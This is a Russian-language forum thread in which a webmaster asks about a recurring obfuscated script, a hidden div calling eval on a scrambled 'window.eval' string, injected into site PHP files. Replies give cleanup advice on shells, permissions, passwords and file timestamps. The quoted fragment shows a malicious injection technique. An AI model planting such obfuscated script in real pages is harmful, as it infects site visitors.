|
Сломали (или заразили) сайт. Что это может быть?
Привет товарисчи кодеры и другие кибер-маньяки :)
Всплыла проблемка у меня с сайтом. начал находить периодически в некоторых фаилах сайта (.php) вот такую вот строчку: Код:
<div id='x0d65a24088ed1686437f1ee911ceeb9a0'><script>var jQuery = eval('w%i^nyd^ohw%.^e^v%ahly'.replace(/[\^s%yh]/g, '')); Заранее спасибо! |
Менять пароль на хосте я бы стал менять в посленюю очередь .. сначал шеллы чтоль повыдерал бы ... да файлы протрояненые
|
шеллы повыдерать - а это как, в двух словах? :)
фаилы протрояненые - т.е. файлы в которых был найден этот код? а просто удаление кода не спасёт что-ли? |
Удли коды, поставь необходимые права на файлы, проверь комп на вирусы (и все админы пусть сделают тоже самое) и поменяй пароли на всё остальное (фтп...)
|
если олени ломали тебя,ищи файлы с недавним временем редактирования.которые ты не мог редачить в это время,их и копай! меня все пасы,живи щасливо :)
|
Та код я удалял уже из фаилов. после чего закрыл дыры (найденые) и поменял пароль. Однако через какое-то время всё повторилось.
|
|
ищи файлы с недавним временем редактирования
могли сломать через хостера,возможно там стоит бажное ядро |
Была давно такая тема с сайтом. Если используешь Total Commander и ему подобные, то меняй пароль и не сохраняй его в проге... там все автоматом действует (етот вирус)
|
а к логам доступа последнее время не предоставляют?
|
| Время: 04:11 |